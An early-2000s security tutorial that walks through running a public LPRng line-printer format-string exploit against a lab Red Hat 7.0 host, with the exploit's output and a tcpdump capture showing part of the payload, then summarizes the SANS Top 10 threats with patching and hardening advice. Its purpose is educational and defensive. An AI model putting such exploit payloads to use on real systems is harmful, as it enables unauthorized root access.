In this article, we will cover the exploits run by crackers. We will also look at the SANS 10 Most Critical Internet Security Threats list.

Exploits

Reconnaissance is vital in figuring out what is open and what is closed. The next step for a cracker is to actually break in to a computer network. Crackers do this by exploiting weaknesses in operating systems services.

There are many exploits out there; finding the right exploit can be a headache. Not all exploits are created equal. By this, I mean that most exploits are operating system dependent. Just because there is a line printer exploit for Linux doesn't mean it would work on Solaris, and vice versa.

To help explain what an exploit is and looks like when it is being executed, I have included in this article the output from an exploit and some packets involved in the exploit. First, a little background on the exploit I decided to run. In late 2000, probing activity increased on port 515 (line printer port). This was related to an exploit in the Red Hat 7.0 line printer daemon. At the time of this writing, I am still seeing many probes for this service on my firewall.

If you want to see the exploit I used, it can be found at http://www.netcat.it.

Here are the listings promised along with some play by play for each:

+++ www.netcat.it remote exploit for LPRng/lpd

+++ Exploit information

+++ Victim: 192.168.1.25

+++ Type: 0 - RedHat 7.0 - Guinesss

+++ Eip address: 0xbffff3ec

+++ Shellcode address: 0xbffff7f2

+++ Position: 300

+++ Alignment: 2

+++ Offset 0

+++ Attacking 192.168.1.25 with our format string

+++ Brute force man, relax and enjoy the ride ;>

From this output, we know that the exploit is attacking a Red Hat 7.0 line printer (Type 0-RedHat7.0 -Guinesess). Want to see how tcpdump views this attack?

18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer: S 4221747912:4221747912(0) win 

32120 <mss 1460,sackOK,timestamp 4058996 0,nop,wscale 0> (DF) (ttl 64, id 11263)

             4500 003c 2bff 4000 4006 8b4e c0a8 0105

             c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000

             a002 7d78 8bb1 0000 0204 05b4 0402 080a

             003d ef74 0000 0000 0103 0300

18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894: S 397480959:397480959(0) ack 

4221747913 win 32120 <mss 1460,sackOK,timestamp 393475 4058996,nop,wscale 0> (DF) (ttl 64,

id 3278)

             4500 003c 0cce 4000 4006 aa7f c0a8 0119

             c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9

             a012 7d78 5ee7 0000 0204 05b4 0402 080a

             0006 0103 003d ef74 0103 0300

18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 1 win 32120 <nop,

nop,timestamp 4058996 393475> (DF) (ttl 64, id 11264)

             4500 0034 2c00 4000 4006 8b55 c0a8 0105

             c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400

             8010 7d78 8dac 0000 0101 080a 003d ef74

             0006 0103

18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894: P 1:31(30) ack 1 win 32120 

<nop,nop,timestamp 393476 4058996> (DF) (ttl 64, id 3279)

             4500 0052 0ccf 4000 4006 aa68 c0a8 0119

             c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9

             8018 7d78 3e5b 0000 0101 080a 0006 0104

             003d ef74 6c70 643a 203a 204d 616c 666f

             726d 6564 2066 726f 6d20 6164 6472 6573

             730a

18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 31 win 32120 <nop,

nop,timestamp 4058997 393476> (DF) (ttl 64, id 11265)

             4500 0034 2c01 4000 4006 8b54 c0a8 0105

             c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e

             8010 7d78 8d8c 0000 0101 080a 003d ef75

             0006 0104

18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894: F 31:31(0) ack 1 win 32120 

<nop,nop,timestamp 393476 4058997> (DF) (ttl 64, id 3280)

             4500 0034 0cd0 4000 4006 aa85 c0a8 0119

             c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9

             8011 7d78 8d8b 0000 0101 080a 0006 0104

             003d ef75

18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 32 win 32120 <nop,

nop,timestamp 4058997 393476> (DF) (ttl 64, id 11266)

             4500 0034 2c02 4000 4006 8b53 c0a8 0105

             c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f

             8010 7d78 8d8b 0000 0101 080a 003d ef75

             0006 0104

18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer: P 1:424(423) ack 32 win 32120 

<nop,nop,timestamp 4059002 393476> (DF) (ttl 64, id 11267)

             4500 01db 2c03 4000 4006 89ab c0a8 0105

             c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f

             8018 7d78 54c5 0000 0101 080a 003d ef7a

             0006 0104 4242 f0ff ffbf f1ff ffbf f2ff

             ffbf f3ff ffbf 5858 5858 5858 5858 5858

             5858 5858 5858 5858 252e 3137 3675 2533

             3030 246e 252e 3133 7525 3330 3124 6e25

             2e32 3533 7525 3330 3224 6e25 2e31 3932

Let's look at what is happening here. First, we see 192.168.1.5 and 192.168.1.25 attempting to make a connection using the TCP typical three-way handshake. In the next sequence of events, we see 192.168.1.5 attempting to run the exploit against 192.168.1.25. Finally, we see the 192.168.1.5 pushing 423 bytes of data to 192.168.1.25. The exploit continues this for a while until it is able to brute-force the exploit.

When this exploit worked, 192.168.1.25 provided me with a shell (not that I needed it), and I could do what ever I wanted.

Exploits are the way crackers break into systems. To protect yourself against them, you will have to update your operating system with patches. (This goes for all systems.)

The SANS Top 10

The SANS Top 10 Most Critical Internet Security Threats is a list of the most common exploits found on computer networks. What makes this list so valuable is the fact that the group System Administration Network Security provides a list of the related CVE entries (Common Vulnerabilities and Exposures), so that a person can do more research if necessary. This list was compiled by SANS with the help of many security experts and the security community.

The CVE database can be found at http://www.cve.mitre.org/.

To read more on the SANS Top 10, visit http://www.sans.org/topten.htm.

The first exploit listed on the Top 10 is BIND. BIND is a program used for DNS servers (to help resolve names to addresses) and is used throughout the Internet. In the past couple years, major holes have been found in many versions of BIND. It is vital for anyone who runs BIND to always keep up on the latest vulnerabilities. On Jan. 29, 2001, Network Associates Incorporated announced that it discovered more vulnerabilities relating to BIND version 4 and BIND version 8. Patches have been released and can be downloaded from your operating system vendor's Web site.

If you would like to read the paper released by NAI, you can get it here: http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel=900 or you can read the CERT advisory at http://www.cert.org/advisories/CA-2001-02.html.

The second exploit in SANS Top 10 is Vulnerable CGI programs. These have been around for years and are the main reason for most of the hack Web sites that receive mainstream attention.

Many of these CGI-BIN programs leave sample programs after installation that are vulnerable and allow a malicious user to obtain "root" access. When an attacker obtains that level of access, he can do as he pleases (include changing the Web site). I provided some links to obtain more information on CGI-BIN attacks. This list is not comprehensive; please dig a little further if you think you are vulnerable.

More information can be found on CGI-BIN attacks from http://www.cert.org/advisories/CA-1997-24.html, http://www.cert.org/advisories/CA-1996-11.html, or http://www.cert.org/advisories/CA-1997-07.html.

The third exploit is vulnerable Remote Procedure Calls (RPCs). RPCs allow C programs to make procedure calls on other machines across the network. Most vendors provide patches to help tighten down RPC services. Nevertheless, the best policy regarding this service is, if you don't need it, then kill it. You can run ps-ef|grep rpc, find the Process ID (PID), and then run kill –9 PID. You can also disable RPC services at start upon most UNIX operating systems by changing the startup file (located at /etc/rc.d/) from an S (start up) to K (kill). You can find out what RPC programs are running by using rpcinfo –p.

More information can be found on RPC attacks from http://www.cert.org/incident_notes/IN-99-04.html.

The fourth exploit on the SANS Top 10 list is vulnerable Remote Data Service security holes in IIS. (To be honest, I am surprised Microsoft doesn't have more vulnerabilities in the Top 10.) I can sum up dealing with this exploit really quick… Patch your IIS.

More information can be found on RDS security holes from http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.

The fifth exploit is vulnerable sendmail and MIME attacks. These vulnerabilities are related to buffer overflows as well as pipe attacks that enable immediate root compromise. There are a couple of ways to secure these problem areas. The first is to maintain the correct patches for your sendmail/mail servers. If you do not need to run either of these services, you can disable them (follow the same procedures as spelled out for RPC).

More information can be found on sendmail security holes from http://www.cert.org/advisories/CA-97.05.sendmail.html.

The sixth exploit is vulnerable sadmind and mountd. This vulnerability applies to Linux machines as well as Solaris machines.

For more information on sadmind and mountd security holes, visit http://www.cert.org/advisories/CA-99-16-sadmind.html or http://www.cert.org/advisories/CA-1998.12.mountd.html.

The seventh exploit in the Top 10 is global file sharing, using NetBIOS Ports 135–139). This is probably the biggest security problem users have if they are connected to a cable modem or DSL. Most do not understand the concept of file sharing and leave file sharing enabled. Another problem is Napster. Although Napster is not listed here, it does require people to share directories and that can lead to sharing more then necessary. How do we correct it? These suggestions are from the SANS site http://www.sans.org/topten.htm:

A. When sharing mounted drives, ensure only required directories are shared.

B. For added security, allow sharing only to specific IP addresses because DNS names can be spoofed.

C. For Windows systems, ensure all shares are protected with strong passwords.

D. For Windows NT systems, prevent anonymous enumeration of users, groups, system configuration and Registry keys via the "null session" connection.

Block inbound connections to the NetBIOS Session Service (tcp 139) at the router or the NT host. Consider implementing the RestrictAnonymous Registry key for Internet-connected hosts in standalone or non-trusted domain environments.

The eighth exploit is weak passwords. Need I say any more? In any form of risk assessment, one of the most common vulnerabilities I see is weak passwords. When coming up with a password, remember to follow these simple guidelines:

- Make sure that the password is eight characters in length.

- Make sure that the password is a combination of numbers, special characters, and alphanumeric characters.

- Pick a password that is not in the dictionary.

For more information on password strengths, visit http://www.cert.org/tech_tips/passwd_file_protection.html.

The ninth exploit is IMAP and POP buffer overflow vulnerabilities or incorrect configuration. Again, the best way to secure yourself from these attacks is to disable the service if you do not need it. Also, apply the latest patches (if you need to run the service).

For more information on IMAP and POP security please visit http://www.cert.org/advisories/CA-1998.09.imapd.html, http://www.cert.org/advisories/CA-1998.08.qpopper_vul.html, or http://www.cert.org/advisories/CA-1997.09.imap_pop.html.

The final exploit in the SANS Top 10 is Default SNMP community strings set to "public" and "private". Along with the weak passwords, this vulnerability can be controlled by basic administration.

For more information on SNMP and community strings, see http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315.

Keep in mind that these are not the only vulnerabilities on the Web. A cracker can use any exploit he has in his bag of tricks against you and your network.